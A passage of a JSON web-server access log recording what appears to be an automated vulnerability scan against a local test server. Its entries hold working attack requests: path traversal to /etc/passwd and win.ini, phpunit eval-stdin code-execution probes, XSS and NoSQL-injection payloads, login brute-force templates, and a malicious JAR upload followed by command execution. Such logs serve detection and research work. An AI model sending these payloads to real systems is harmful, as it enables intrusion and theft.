/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MFjLyISyfyOWHCcGg2wxe3a6.jar\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 \x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"https://example.com", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"{\x0D\x0A \x22auth\x22: {\x0D\x0A \x22user\x22: {\x0D\x0A \x22$eq\x22: \x22admin\x22\x0D\x0A },\x0D\x0A \x22password\x22: [\x0D\x0A 0\x0D\x0A ]\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 